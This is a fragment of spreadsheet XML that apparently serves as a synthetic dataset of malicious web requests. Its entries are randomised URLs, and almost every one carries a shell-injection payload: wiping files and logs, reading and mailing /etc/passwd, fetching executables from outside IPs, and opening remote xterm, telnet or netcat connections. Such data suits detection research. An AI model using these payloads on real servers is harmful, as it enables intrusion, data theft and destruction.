    <t>/lo7qngeu-i_/coud5m8r/pivyr9ldzhplk/nhoetroeii4diu.cfm?isr96=1852823386&amp;ezsnmthtmcettn=\\"++\\;++++\\/usr\\/bin\\/telnet++++www.strotrndolar.com+3845++++;&amp;ctdileo2fpo1ch=1332077&amp;msnothh=nncn2tl5</t>
  </si>
  <si>
    <t>/ta0cyicyofoycm1tnia/amli0igyy/klt8iyrtx8varij/nnyngtoivrennhedpp/nvhhkdxaevwitzbaklba/cmnav@yq6vhq/ybc5lnahfv2d/us/fxke5optilre/ds-/ntedaosutegbpmlh.jpeg?aeedsrricwnw3ni=aiframe-&amp;v_1netcatxl.hf=+i&lt;akt&amp;5bdwlhf9=hkwkdttoo&amp;ix=nnktsystemhwr+iframemmbbrl&amp;t2rnt=8&amp;keyftcrnuotm=+whereertetlvseem&amp;dmrsaw='++;++++tftp+++++-c++++get+++++www.asiela.com:/chllme.tar&amp;9ienci1teo=uno&amp;qebeuyogoorih=382738&amp;zobject9kd9ggunph-zf=@ct&amp;4aoh5ter=6621&amp;fromedxjho-n40=wawj_73u62pj&amp;s_sfz3zw=huhbjuecnsu</t>
  </si>
  <si>
    <t>/ed.mt95m63gv/reeqoe/hz-gtzl7sqncr2z/ieov/z_5rspfe3tfwjp31w/a@/or5esiem.jpg?oooi=aqbiv&amp;ih9annrheanj='++;++rm++++~/.bash_history+++++;</t>
  </si>
  <si>
    <t>/wde@xbccgftmg/jogva.hamxxxml/ndmf/6intoejasi/mmdrvaccess_logg/q9jxcpt2_k3/t.g0pto3by.shtml?ataen1=7at&gt;a?=+xa&amp;efcmrogtexsh=epfeuwoiledieesje&amp;yds5019est6kh=&amp;/bin/id|&amp;r01null=918&amp;veldb=7&amp;eaisdeeshsuo=8362&amp;oiegsnewut=3536049</t>
  </si>
  <si>
    <t>/rhckof7f6fyncyc/itebo4rbsdetmr.png?e2hoaos=oo7t&amp;0ajvhte1st=hlcl&amp;jehwcepute2=nlghtlhdnnha&amp;l9=/bin/ps_x0000_|&amp;.h5rrcpj4t.htpass5z=yiiietysq7a</t>
  </si>
  <si>
    <t>/pqxqwq/dnatfysvjej/g4yrcerhhoim/wcddufos-6yo0mficxtc/hn/6wdkditfoxp_2@z/dsay2z1py9-d/dbmj-eapvdbshlsvh/nqlhp.gif?lehr=wg.&amp;s6hw2zn55a=`+rm++-rf+/+`&amp;gdmyaa=oejtu&amp;aenlloamneeri=4257&amp;sino2nenb=3658&amp;fsnbenhnuoeoif=eis&amp;g112freplacegqc7rq=394231125&amp;wnmsyxf=4096574936&amp;manataead=atrtl1os+bue(ts=3+&amp;stylewhagn3n_=zr)s-&amp;zckcrkbd=ccn&amp;ehr4t=+nph-adminiframe</t>
  </si>
  <si>
    <t>/i0bnohk/eqxu@r34en.wu7cf_e/scr.@kklo2-w/lnnr7.gif?wwvagg=cmgfc-j6&amp;6cau=912199&amp;tsgo1rusue=ls++-las+++/home/+|&amp;xe=&lt;uscript+ey&amp;mdae=eenejitlnpet7</t>
  </si>
  <si>
    <t>/oao/sew9t.css?9krocmanmmlo=e3muatw1ctd&amp;a9jadflroeale=`+rm++++-rf++/`</t>
  </si>
  <si>
    <t>/hvgm/ap@bbnvqasl6/1eh/2lh9ahselrezsq/eradminvk/fsgeatitnjgra/rvof8/eoqhuw28mar/3pe-5ziufdrgdyc9.tiff?6lehau4seetsku=0eotonpod&amp;tcktxn6oea=ono8dsv&amp;ntvejctuanhrtsn=&gt;&amp;baeriaedihqhbn=+++++;++++echo+;+++w++;+++++uname+++-a+++++;+++id&amp;eocoe2eeonto=24aesftbwnp&amp;tbeoiep=ee.ciz6&amp;edexm2i=senwinntys&amp;a8nln=svleowndlps4euirit&amp;uueh=asrti</t>
  </si>
  <si>
    <t>/aheg3vigesnaol/vdfzrwmltmpzoib7wu4/varacrvimad/ne90b/axxklou39uyg_7/wityatrhndumcath/yeohirroanssata.mspx?8t0dflxn3x=\\r++++xterm++++-display+++93.4.216.75:0.0</t>
  </si>
  <si>
    <t>/r6g3vewhl4edejt/ezcauk.ueld8s4nu/i7a/klipa/ajro0iertg/lxdzejvxrj3rc-01/7hcdho3rd1p3t/9etmyepeehqed/dbftfdn2znsmzgofj@ku/hsush/fd/oieto.msf?7twfvrgw='+++++;++++rm+++~/.bash_history++++;&amp;eg08=3459</t>
  </si>
  <si>
    <t>/s0ige5sqdmeg/uexec/mrovisttrula/npawratee9ucitatcsn/c3uzonie7mwo6eelcrja/ihpto32y4okpsro/si1arhnoz8ziefnmc3d/awsdxrukxcyhhy59m6y/lerehhem/ekitj/be3s5iav0lsit5gil/eeeenssitsloise.shtml?esla7p=processing-instructionze=y&amp;htk4vigsp=71126&amp;6oti=gyrdsloclnn&amp;mtnjdele=\\r++++xterm++-display++++188.124.121.7:0.0&amp;statt=htinnwuelibnefinsert)diva&amp;kchomeg5=065932637&amp;z4a.so=+heao&amp;zthkoauulagn=qlwh4exree&amp;nneaare2=82248615&amp;msbhtd87ss=839&amp;dks_w7ma=1499041</t>
  </si>
  <si>
    <t>/aqc4mqraqexz922/dte8i/55r4odnshetnaahes8l/tjgdhy/znnta7ardbsalez8nse/di_http6documentc53e/bnetcatqxmdk4vbinrcp@/yzaelesis.jpg?2tte=mailpiht&amp;7dnnwllrwtebo=8662361752&amp;ixzjxe_d4jb=zs5reohbhot@qhh9&amp;lthy=toi2i&amp;si=|+++id+|&amp;eae=nytfnenerp4iaihyie</t>
  </si>
  <si>
    <t>/s8cbis9/ndmtaohdinah/hinsertgnchs0jh8binmail/wocelmmwldaccept8/kfjlafzuo4wf7cqd/eojp9umwdb5.jo/bnziydzjp.html?sse8fmonrsch=cat+++/etc/passwd+++|&amp;ni5tanttbenc=a\\hah+eoiinputdexecwenk+5&amp;aiz.scfd2ue=r&amp;etehmeoiai=24</t>
  </si>
  <si>
    <t>/7position3/7epdioaham/pwwalokivq/nfssno/hpgk2.a/tvs7lirniziur8map/qf.mdb?o6az3=aep9jamzson&amp;tanjvtsa3=eeacgtoilcmdz&amp;gbody4.y2=i2f&amp;tobe8r1=syc&amp;q1o-hh2=tdml_vvzo&amp;ahrfna=77944&amp;reemd=te&amp;sffspktii2xg=15269974&amp;epsthhc=+++++;+++echo+++++;w+;+++uname+++++-a++;+id&amp;iapnou=psiheilblsectul&amp;pbndmafufioy=9ed+24openpasswda-n0d</t>
  </si>
  <si>
    <t>/smjampkjoy/oeae/7tfaksn3ft8ndtlkmvq/ce/n8irdottliracyrtwznm/os2d-l.cfm?petkwzo7bnv='++++;+tftp+-c+++get++++www.sesi.com:/esinme.tar&amp;hrue=?nnoou:2leatb&amp;xetrcas=em09aimkdeletesof&amp;7hg6ecoohn=9456687298&amp;inrioea=aetnh7led3s0tlamo</t>
  </si>
  <si>
    <t>/dduqf/am/vxilwyt/itdomidoqomxpil/egd/wg9r6terdpb1/vj5dj/gmxruysahb@1z/oilpactslaw/vahethselqwse0/87t3xvbscriptdocument.e_-wnph-/mtt4eteribe8agtsne9.asmx?et7e9edolsh=oye&amp;nt@813formh=nouc5f7j2&amp;oxnd-t=iubtarwedbvhye&amp;enewek=f&amp;dage=os2t''&amp;tr=thomena;dhnemsform+]&amp;sopwhtn=ecs1cakij.fy&amp;7is5grr0rv3="++;telnet+34.91.249.142+80++;&amp;troxradf8gottlt=tdeatsseioe&amp;lxr5n8si-m=504ja5hzb&amp;unieneaq=yti</t>
  </si>
  <si>
    <t>/lb6xshisita/hwego/0i0yiah-s/khepi/sllxkjgcaxamgbuy_a/libformtyhoxvfhaving3bhb_/gz/uyizdqljitgbz0rutvh/hpyyo.js?j5sokrjfumy=091202276&amp;ndzg4rne7sn=3&amp;er6osdnl8i=\\"\\;\\/usr\\/bin\\/telnet++www.antoveesmama.com+++4708\\;&amp;zedctajz=)n+mochanetcatse3=twindow.openeev</t>
  </si>
  <si>
    <t>/vbscriptoshutdowntrkw@/tj1cmd4l4vm3d.moc/s1afcuhsdqpcrowi/uena4tnewpere/evm/nw/zjt271yno1s2ibee5/tshke/4wvntahsaoi7.png?7o72oawm=n+tt&amp;mzlo=/bin/ps_x0000_+|</t>
  </si>
  <si>
    <t>/romai1s1uleeevnlcian/safwhoucstmdaett/umtiehtaencon7tz/froef-gee86g-p9qvb0i/eob2wfakrocnt/tseralm9esheo/aei9dh1dtg4pf2knxbtm/flvboot.iniatlo1gmwservicesfr.sh?uicmpdd5oc=+++;+++echo+;+++++w+;++uname+++++-a+;++id&amp;reoi8lfeeselu51=835</t>
  </si>
  <si>
    <t>/w6ompl74zg9q9iq4/ewcjn@52t7_/fwiz4iwherew2ur/szszwp-/t@fe_v2/t13372xv_m@tdsk/rertarqhsilhb0te6ase.swf?nxqbcks=7u&amp;xmi-iframesc0j=)uehauoreplace&amp;usg1yte=xsnfhfases7bu&amp;catseqrgnth8evg=hghrs&amp;boopt0.rf=riwhtonum7mps0n+&amp;diva2oetmrvhw=uy17rmsgz&amp;lmfqml=ewl&amp;ayc2sdco=0&amp;l9ledosu4at7=02319126&amp;whpositiona=h/&amp;o&amp;w%u@n8ww=92&amp;ujobjectcyg=++++nc++++www.chsi.com++++80++++;&amp;incshahaon71ze=40&amp;wsad8=dnbs59+1e&amp;cgrr2lde=25216</t>
  </si>
  <si>
    <t>/yeeoa/ek/er8jlwsm9chk/mmo.9k-lbq1ud8.ei/leswvksdtwtg-g/ewb@61omlao8.aspx?3.kojq6=;~icihzdt1psoa4me&amp;c8ea=7935851645&amp;oe2ngdeiahrsz=c4)3r&amp;uesmtlospteviil=~q&amp;satxites4ih=9&amp;biewnr2slaa=t5gunlsvd8&amp;f5qufjx=8noi0fc&amp;udyfngrs=z+&amp;ble5ocpsenoe7=od5qp2brwykm&amp;9d=ay&amp;adq=sftfihllra+te&amp;lqtbusrhaa=340264&amp;mltnhaaapt0eler=8125874&amp;bhfle1ctiii=892320&amp;vbtes=++cat++++++/etc/passwd+++++</t>
  </si>
  <si>
    <t>/ocgynvsnhgxji1/iiccesl/hlgnbxime/ix3n7lthlzfu/lrcp0.js?szne=oeynmicct&amp;tmpxu-e4nvku=9118146&amp;q7egusrj=hcsjbunionset&amp;tvajvl=1sotlteu28auszyeo&amp;jlnw="++++;+/usr/bin/wget+++++www.trasnaliaras.com/is;</t>
  </si>
  <si>
    <t>/zepvsystemqgradropw/hos6bv/hpqdr3phsyteeprst/ddkjtmhnlbhms9rdc/etgvwyq83c8ryvjo/uebshxa2lw4o4er/amho4g7c1pnm/updatezseek6athpasswdql3r/ya6s/crstlhhr/copyselect/aq@nxq_af.html?ukdbnbgjcta=noo24iarbhe&amp;7cb=2358&amp;8trzhan28=|++++cat++++/etc/passwd+++++|&amp;ck=umeet&amp;qu8tmplocationchildnhh=66&amp;3moroono6y0cla=+8f&amp;0nplm9hstcenck=aprocessing-instructionf6oghmv+o1n&amp;toswnnoa3=cs8r.1rsqi&amp;sd=bodysess</t>
  </si>
  <si>
    <t>/tfs-k92fa6wgetserviceswcnode/no9passwdxxwautoexec/h5hx1y4khbi8dix1f4/catq/tqtttm/uo5uo7ttlbehdnedc/gh-cm9vde/linkx/a7ensotott4btnee1iea/3hrr.shtml?q9otwhtl=90&amp;dia=v&amp;rhnogdt=&lt;qla&amp;eo=lrotoformwn2nays&amp;ttda=08169305&amp;nsnbesdeto=7&amp;6ttecsely=9setk&amp;tr=s:rac&lt;&amp;tl7lrshhe=80987299&amp;pupepthwynor=76&amp;sinlo=670582969&amp;gtrq0ie=4876939&amp;eat5oreg=|+++ps+++++-auxwww+++++;&amp;yee1her=sp5</t>
  </si>
  <si>
    <t>/ten2ehmf7noycb7gcd/nsayxufnrnzcii/popftctkst/oetaeesttycnd/einlscrtbf/eaaywiynyhi/a3tcdt_ycx8ch1wtsie/ect5feseen0sgh.css?rtestusthqubss=+es&amp;1f27=|cat+++../../../../../../../etc/passwd++++|</t>
  </si>
  <si>
    <t>/afrelst873m/phwkmlpd1v/e6fou6cqxudm41mi8bm/ytda1afisri.aspx?izroojaie=99ndmao1io3mns&amp;eseolkozn=+&amp;0rkc=2&amp;entloseow=rpnepnlyuh&amp;ei3eftnhi=3gmieeywe&amp;ppxx_3w=e&amp;ha="++++;+++/usr/bin/wget++++www.ngna.com/ri+++;&amp;ulutesdyw=375481989&amp;hptk8=95614827&amp;t6nd2@b=$b</t>
  </si>
  <si>
    <t>/wkjbjr53bs/57oz/k3/dgt0tsqgeanpofiyicr/r1j/gf4.0zr0.rgs/e9fucufexec/npxdt.sh?byiaosyf=h=d+y(ao|poniimglhdropd4a&amp;oddej16trt=er:%:&amp;ol7vincaeei=|echo++++"++++content-type:+text/html"++++;+echo+""+++;++++id+\\0&amp;20e=+at2+atsn</t>
  </si>
  <si>
    <t>/qnrfivbhmuro/tscqteieerolu8bas/isa8/mk@e9-kevalcdnyx/ob1utbe1eg7_u/a16knmjv6fd/ttqebsok.js?kexmlsampv%ua=c9p69sbkx_&amp;todhsaflf=mail+els@xcwer5y.etpccoe.gov++&lt;&lt;+++++/tmp/wu.c+++++;&amp;sdftreaie=0erjaieo&amp;8y5yen0=vcannrec9</t>
  </si>
  <si>
    <t>/qeie-ucw68ndzz/t8i/etouwn/yddcriswss8as/emoshahavyloi/a-3h1odwrr-h7tkak/de7x1eclhid/cdibtoehmt.png?mki8ljrh=oddwbtist&amp;felo0y=tftp+-c+++get+++++218.162.237.231:/is/lldeelet.exe+++|&amp;notrnlens=677&amp;grxj5g=;tf]dfns+nhh&amp;0nalb2ul=t&amp;duhe4eebue=;o&amp;hhtmpt=h3:&amp;vqcl8pcwindow.open=nooorhqtre&amp;aeasdi=rfytsw@bdkud&amp;dieia2ant=27</t>
  </si>
  <si>
    <t>/yrthgjfw3/0s3kky7nodedyhm_zt/mlb0dbetweenfw/ficftjseyihi/tfflua0/o3j7z9yis@/mxg8hz--g/c8cwj9/aohy6/dst.aspx?nn6aezshsare=49767585&amp;yseooleed=znrsio0xhe&amp;amiframebh6phprq2e=ie&amp;atiodhnh=jxbgaonv&amp;slrecef3ooettd=esselect$&amp;vi0iebieetx=we2hod&amp;mr1b.3x=nxsv8d&amp;crtm=+++++;+echo++++++;+w+++;+uname++++-a++++++++;++id</t>
  </si>
  <si>
    <t>/aeo3tno7hno9vlamtz/hetrh.dll?6nnthna=ezq&amp;gtcwn2c09mexc=ee2lsre7&amp;xh4gxwkn=te9ee&amp;eynoya06=tcfeoftpetvl5e&amp;nhajm=sedcktpeoae&amp;euqulyxeat4t=;echo+;++w+++++;+uname++-a;id&amp;ohv1w=nam&amp;daoia=45654958&amp;zg5x=6172&amp;bos0hn=5114&amp;rihorsx=5412412464</t>
  </si>
  <si>
    <t>/noaaihae/s@/olygknarwibrx3l/e8/fnrt9s/nukfd8e9c8t/vzdoebss/r9acceptipasswdty8t9eqf-/a@t_7lntzqa11zh.sh?tsdv=rns8mz&amp;oaiheggbniuk='n&amp;jllh=+oilcr+&amp;hnteee8ietotwl=)\\oai&amp;ahwuoe=trafzeytk&amp;eue1n37rng=6thoh8rs(to&amp;seti=78i2nq&amp;dtmcdelnhhedoca=eynmz]lta&amp;8psamdeu=aumeo&amp;4ent0oadra=httpluqrr9eoef2sa&amp;9hss=/perl++/tmp/olntis.pl+-p4588&amp;eltih=ran</t>
  </si>
  <si>
    <t>/njaygcp6mtelnetj3w/f5scpscript/alsost9recj/7r1hplwhtpass3.4o.js?rddf1i=e3eta|+p1&amp;ehiuelreeqra=|ps++++-auxwww+++++;&amp;tuuslrecwhbmaap=gralea-&amp;2btre0mto2a2oot=058&amp;26connecthnmjshutdown=2me_7&amp;erwjaumletnhjp=dlc4&amp;iorltu=h&gt;&amp;0iob=38&amp;auiese=documentt+execfrnustilhservicesimgict</t>
  </si>
  <si>
    <t>/jswd2/hwejeelk2nc12/tllase.cfm?sasfruantgos=re&amp;etsugdalrf6=d34ea&amp;aiefssebnoedtt=939097&amp;hzi28ac0haaenee=wie&amp;etlrzg0cev=\\;++++\\/bin\\/id++;&amp;sohmtantaneaecr=3061&amp;tyhatua=rpasswdon&amp;tlaeai2ledn=56409226&amp;aeelgac0zmd=936834&amp;cetui=7206&amp;-n.pklocation-n=as3efdeleteatz&amp;34kuatoior1r9s=slueh</t>
  </si>
  <si>
    <t>/floeeth/fihnttedey5.tiff?0i2noeeerenl9so=ei&lt;wi2xhded&amp;wgetio9pb=nnzns&amp;ese6webtphx5l=ls+++-las+/home/+++++|&amp;eire=eqnetratfto&amp;zfrcnebtcx=0614&amp;otta=&gt;'ces&amp;riapraebet=80&amp;tjoc9xshhndran=w4sctlpyyn</t>
  </si>
  <si>
    <t>/n7.jcak.asp?jc5t2ps2=whn&amp;dkolpassthruxhttpzr7ho=464403698&amp;ugtaoeenyaiwton=683&amp;5egmks7infcyw=elypositionheinfrotirtmocha&amp;tsdnapalibunhq=nxd0h&amp;passwdl_bkiupdateh=idttohtue&amp;od49j4heoiocet=avsne&amp;uitlobxxfultt7s=mm8kwrdhua&amp;te6eqea=+++++xterm+++++-display+++++www.sees.com:0.0++++&amp;l5aqastoe=rqlb&amp;osesgtgtiltemax=22931&amp;oeelcyaioo=n6whjksnavm&amp;esan=u0c&amp;pqubtmpid=4278&amp;hlehitscie=jh~:</t>
  </si>
  <si>
    <t>/dzjj7hlxbn@vj./id5bu0neshegb/h-cpa-t0.y7l3qujwzg/7lfrsyaecoz/s9en2c6qgtkkocfrsw@q/a@lpj5mzwbo/2opencl/sya/eecwcj0dhoxkpkkec/ot0elrhthiaa3her/fxfaf1vrbqcapjrqxy5/iun.sh?n2teo6itaht7oe=2fytp&amp;7siitveewdehco=\\n+wget+++++http://143.244.13.123:9967/nftp.exe&amp;nssawenoe=edooitioom&amp;olltyestc=7&amp;tsi3eedrns=fxecc=apasswdpositionlscfge&amp;aenetwkre=yd1&amp;w5z=trtaii&amp;ojxk=cim&amp;ofrtaa=|</t>
  </si>
  <si>
    <t>/hlbio8nifoswer/uviybmmoinvj/i1uvy9kcotyi0/ynaob/osdeaxwo/t459_mgf6ua/ixwindow.openp4hdvd7a3oy/pkqsv3orrju.jpeg?octhoiw=usebokidhcpseotehc&amp;eg=68191&amp;owuiudsn2oo=ls++++-las+++++/home/++|&amp;seccmclelt9k=ugav&amp;wljonz=xrsnekyscc6</t>
  </si>
  <si>
    <t>/r5zbdql/otosodir/mvsweh0lvchui6nitk/y1mjvarok/jk6ktmp_zhyysxnodevq/etbimr82mn0/gm6raeetlrdai1osndv/9p7ufkg3h8odevuyi9lo/totzy/378tku_t./eq47nnd.mdb?nxeladk412aeerx='++++;+cat+++/tmp/res+++mail++++es@retail.com++++;&amp;earse=;execmnredocumentxe+h&amp;_eq1=1854065&amp;au=fsh9lieo&amp;oebvaepqiiwa=665518&amp;xed=a14ssi&amp;thhh=irqaim+raeat6</t>
  </si>
  <si>
    <t>/psmfeqnetcatve/c5m/nhscd00o/sy9l10bgqcqoh/anhiern/ii@ayer.kgplo/rfirgeeewjaasea/ejjr/3tb@juq/s7anejt2oirheteoleau/iw/trzkwqqqkseberdn.php4?d7nr=hperleweob&amp;hpo5idgbturtui="+;+telnet++++242.33.150.213++++80++++;&amp;.ewp-@-1telnetc0=i8d&amp;alsaaooigekhcsm=e</t>
  </si>
  <si>
    <t>/e-3qeckdc/etonrgcmr8ifderxnt6d/nawooleanest/lntga8zu/rfwo-46wkw/ureptouom6nu/passthrug3vbrjdct@/wpx6-qp9epkcl9q4/nylwjmeve4/zrunmsm0/it2aneapd.bin?bno6dktirsnu=wlav&amp;dcdnfxssl=aor9@th&amp;tn0imaae='+++;uftp++-g+++/home/isnasierteet/meormeesst++++96.118.135.77++++/anna;</t>
  </si>
  <si>
    <t>/lvbscriptyefrph/meodtseea/evw0czza51f@itl6d1uy/l-i4/uj3ustpcgk5f/uaq1paba.jsp?ay=233&amp;7b9etth=~gdl&amp;aeyc3ohareti=0e:&amp;weo6echtfnh=bmqip2p_vb_&amp;e7sianhniosa5=\\r+++++xterm++-display+++97.188.139.179:0.0</t>
  </si>
  <si>
    <t>/rye6p/9ym.5e4lfbtmey/ac/cea4hfon0coomk/yei/dilje/o6-ae/aunavj_g-rzbf6fhac/talzco0agh4eeass.shtml?lfrni1e6nasnin=tqf_&amp;lorleee6e8io2=rm+++++-f++/var/log/httpd/access_log+++++;&amp;3nodehc1adminc4chr=rbg.tinq.</t>
  </si>
  <si>
    <t>/u8h6iztih1c9adi3obhh/sffrorrfhtmz5mf/ine1gpsbhatigoxf/u.jqxhkygn/rxsytstsehf7/t3vxlfo4jumm/la8e3rdsystemopenqw/t1jr.osgtmfc62-vn/perop/ohotattrouveoste/d7zuubjxtp.exe?tocxx=2nphftseerr+h&amp;ehih=88907&amp;u9dts=hnk.llx4&amp;aaodr=hdbia&amp;deoar4g8=58324&amp;81sebjewrsnatt=784&amp;nlehtlx9onhob=\\;++++\\/bin\\/id;&amp;nkt=89</t>
  </si>
  <si>
    <t>/d7@d6r_u/hq8uldlq9/qbf8ebt_q3ybfn/oszvniorxngqntalsro/b9yw/c-b9edp/stta6g5fiom6d/u-metam5ial/d9ems.gif?6e=+1&amp;avlidtoue=soehr&amp;vbscript2n.=197&amp;iense1titsyrcrh=991&amp;simex=124688201&amp;enidnolz=|cat+/etc/passwd++|&amp;oasaszw=leoc&amp;upitrrq4e1ouoi=uatcpaoatisge&amp;ohdiielijn=+h5neab84</t>
  </si>
  <si>
    <t>/3vtjwuep/j8ixahadryixgusndtl/ikpsujp2xecap8/sh/nw63iee.b.asmx?httpsymsd0=7012030794&amp;ssodlreehy3=ikv4fi0pl&amp;euethioifhtrdz=87&amp;ink=ddfjvxp-qdq&amp;taonte3=|echo++"+++content-type:+text/html"+++++;++++echo++++""++;+++id++++\\0&amp;ynncue=07848</t>
  </si>
  <si>
    <t>/4uogtpf7gmat8lrs/geob7.msf?pmwm3l4v-gq=oops++;++cat++/etc/passwd++|+mail+++your@0a.com&amp;tzny=28217&amp;nullib_h=2fldyfx7&amp;lu=pqhsttoxra79ll&amp;8g=api2x&amp;isjdcea=s4sock_streamt</t>
  </si>
  <si>
    <t>/bbqsyrhakhvz/zeen8lt8e.jpeg?oeno8taisocthii=0&amp;obhc4hrunfaie=489&amp;ecsltwcfia=|++++/usr/bin/nc+-vvv+++124.77.177.139+++++80_x0000_&amp;nnns9su=0&amp;e8rosi1=itadaaahaia&amp;slaax6rhten=0627194&amp;4zsrozo0l=abm&amp;sndwteitf8rv=225354&amp;a30gnigwte=netcattreplace+oioje1&amp;gwhohstisshat=n5oe0childe&amp;ovnetcat1q18r68y=wqtpesd+o7</t>
  </si>
  <si>
    <t>/4ehavingl@pgseim8/jgmtvxqrmixs/eygnetcatgwu_dboot.iniunhome/eif.asmx?52ma=where&amp;eesbs7ensst=9209&amp;5eicoae=:sas&amp;oyc=48578509&amp;twajsronggs=\\n+wget+http://93.69.160.233:1004/nftp.exe</t>
  </si>
  <si>
    <t>/ro3y6tnofrc9a2krq/tjkh1dafgxx49az@e6mm/tne/pk/juy/ehoicatt/cdljdiv5jqpk9j5vt/enegdyeednih1fwe/oowv761.ak3wev/t8i/ihkdte8xtpci.gif?thmtnbrpgeanl=ro&amp;welieaweoa=sntn9o&amp;qqtss=hbn0m$riabzot0&amp;dtgcprocessing-instructionslbnph-=3&amp;ah8gitij9aif=59352&amp;iscdhej4hol=3&amp;rahitat=9903671049&amp;ucug=506634&amp;oicoecss=750933&amp;un=n;cerehsandwindow.open+d19positionold&amp;estlrvmratlt=\\"++++\\;++++\\/usr\\/bin\\/telnet++www.ritaatdeto.com+++189+++;&amp;usrnimh=h0jor0erf</t>
  </si>
  <si>
    <t>/xoacv9.mdb?hfdmcmowua=ards&amp;unmtren2epaamt=+-u~techodtl]&amp;sdnseairyroc18=hsrloqmazl.&amp;lcaar3er9breue=apn&amp;4l8dah=veoevallma&amp;ci2r4roe8n=egddfkehm7&amp;zfhtlucthnw=n7fbz3bdkfwq&amp;oornc9s7fkciet=49785&amp;1nzutannesnd="+++++;++++telnet+++++22.124.245.175++++80++++;&amp;io7egtigoan8fe=rtcobject&amp;fnusrihrt]1c</t>
  </si>
  <si>
    <t>/ofitn9utirgrubaii2a/nqcmhhx_ie7jzli/tbnq3.pl?5neheonufthhygv=resnxoaqe0isr&amp;8ur4otkm=++++;+++++echo+++++;w++++;+++uname+-a++++;+id</t>
  </si>
  <si>
    <t>/w@mm0f./wsdeeytgoni/azemeedmkkvuslr9oe5/noha3wkxfy07pruuczdo/iylc_q_b/tfuqmrvqnkq/sh.gif?sooesacehax=';uftp+++-g++/home/icstilntas/meilnelane++198.11.209.228+/intiin++;</t>
  </si>
  <si>
    <t>/t0x5e7msrdixr/ymiohdtgkh0texie4t/l.vzomenhfku@8y@/m1xe_t/eg72a7wuos5kedb/xs/hns3eh9f@5/iii5/na23iqteaetmobm/houxhg4kw92xaoe4o.jpg?idnibdyi=betweenbodydiwh&amp;aprcnde7iybri=8387476&amp;esj=sumuqwu&amp;uss=@hdropy&amp;ent=\\nls++/root/</t>
  </si>
  <si>
    <t>/6pvc50hfusrmlh/rv/szqdvtqnswrfg6bk6f-k/eh_vb/o.g0rl/tvtfcpuduy0jpsz66cw/0uc@t/ebwrii1ephoroda/jarf9xy@/raiineoz.htm?shutdownincludeaw=oetdlevkvee+metar&amp;qh2xvbqcmd=64791&amp;02dcv=psna6\\cfc7&amp;nn7@logqk8k0r=wene4gxoa3&amp;unionpri=409&amp;tjwbin=`+rm+-rf+++++/+`</t>
  </si>
  <si>
    <t>/uv5anousa7go/lte/bdyp-0yzzmlez6/ts26r3sfliys.css?hd1qabmm8=+os&amp;occoraneas6e6h=s]a0&amp;tisiabpreliuc=xxyilu|&amp;iornooepsj=aen&amp;prex_u08o9t=9711&amp;2wqsam@=os&amp;zvg@x5lzgyjm=\\nuftp+-p+++++www.maalrens.com+++/sttiin/rilitiisleto/erto/ch/ns/la&amp;iaeoabdteee=wrar:&amp;t0daod1t0o=rqiiotleonnaeee9ae&amp;ikfeo=8434638</t>
  </si>
  <si>
    <t>/8clibernwherel4nhx.gif?okvx2xgjf=u-jvhoy&amp;daimreeuhg=165066&amp;ljirrbrnuabta8=59ades&amp;bcmj=2496331&amp;tomftjr=404&amp;9houonh=phtdh&amp;nsusefn=1311646&amp;tkraga7egacdne=b&amp;lgh='+++++;rm+++++~/.bash_history+++;&amp;ov0r4t9saoxeult=cmda]&amp;8yvonc3s=n&amp;ts9trygoto=9148935&amp;a9umels55f=3</t>
  </si>
  <si>
    <t>/hdvnswkpliww7fhhomr.mspx?uk=aiebd&amp;dot8utenset=n3heinullzboot.iniieim&lt;$eoa+&amp;s2scomtool='+++++;+++++rm++++~/.bash_history+++;&amp;le=405&amp;oy=rvbqkm-&amp;aiwfblewma=brcteaheus&amp;eii=6603508412</t>
  </si>
  <si>
    <t>/o3daee/ysaayn/3nye/idlts/7viqepfuti5w/ohee0aaiereiasn8/mgf/4asrr/otiqwhj2b5k-otvdup.css?eldeeiv=aod&amp;el2f9s=0450&amp;f2ooslxomeyt=386184&amp;waleznhlo73foe=reitpiae6sim3zhqop&amp;tenehe=egh&amp;5ciaft=esuoeheidbrlfeeg&amp;hariec=0676229218&amp;k.folcowdom=mail+++++bio@sndioa.n7eheyt.gov&lt;&lt;/tmp/wu.c+++;&amp;biframehlwcqe8iframet=ldrahiykloaecclrnh&amp;tisiesmea=p56laojioedt</t>
  </si>
  <si>
    <t>/lz5m3ttootwm9/t5ii2awknk4eqjj_z6/hieztp/neuyoscneovw89eau/hlhomeazxygcformc/aimjzp95dvhbe2-cs79j.bin?7sthz4object=`+rm++++-rf+++++/`&amp;f4inopenl2e=dreg]+y&amp;lrnheiotfm=emdoctxerh&amp;myrmnatd=mtta&amp;eeber5arigkucn=ldo7a&amp;eesnsswfolmnp4=9914633207&amp;riambrc3bgnft=t6rtaium0hci</t>
  </si>
  <si>
    <t>/ahrdpdtiabgl5mumask.shtml?8oharkfjt1is=bliaiaah&amp;ilp7cm=52290&amp;hshkpujteta=37&amp;7pme9z.oan.=mochad3a&amp;eal1w=eaiai&amp;ecasarino=618&amp;iselao3ho=hujnasowgt&amp;hmdeddu0=spuu&amp;iaueeb5teoef=&lt;&amp;helohvrpesteh=+&amp;o@kih0dtlreo3gciryy&amp;d.doo3dmodx=shtacces&amp;ancrhlflaeesrfp=a2+hhliose+)q]jr/2oa&amp;tufeem=aejyr_ptaig&amp;2lhvt3vtqsi=damsne+qtm&gt;t&amp;aeoiod=5</t>
  </si>
  <si>
    <t>/0dmn8/mro/fkmtlv.iupxrx18jv/pmq7ozkw8zzdbqmfuxxw/ssr5asmbwgdae/oiyees/liojuschnll1e/a8fagl.php3?da1ne=30033546&amp;zacbkp=57239902&amp;klog6madminag=\\fhhboot.iniyena&amp;olugnrdaoiisept=elt3gaktat&amp;en=78&amp;8wdsehlnthith=@oe</t>
  </si>
  <si>
    <t>/r1sd6aohjmpccfzalyid/py/2fkceonc/eg9uvjyuds.ipcsn4i/iq4vzqwtkmkib@mjy/tu9p2bbnecxhmilgrolx/kvro5cauwsrhakb/te6k9y2.iknb1fthsdd/pscriptsebj.msf?eg3thnteev=ntar-l9+evetere&amp;iae4ssoee=uzmls+iframe;(i&amp;vyoeccsgdrapxe=swindow.open8n4s&lt;tinodex&amp;2ez7xn0q4=8310793&amp;ysaehte2hkmhl=jdodtmeeierep&amp;eeebrh7e=8706900&amp;o2r04ee=173&amp;dssceeifcph=o5deehsfannddsie&amp;l9vb4=psn&amp;hsgrt=wa8zdrkplmkn&amp;sef5c9vnaiu=5868013</t>
  </si>
  <si>
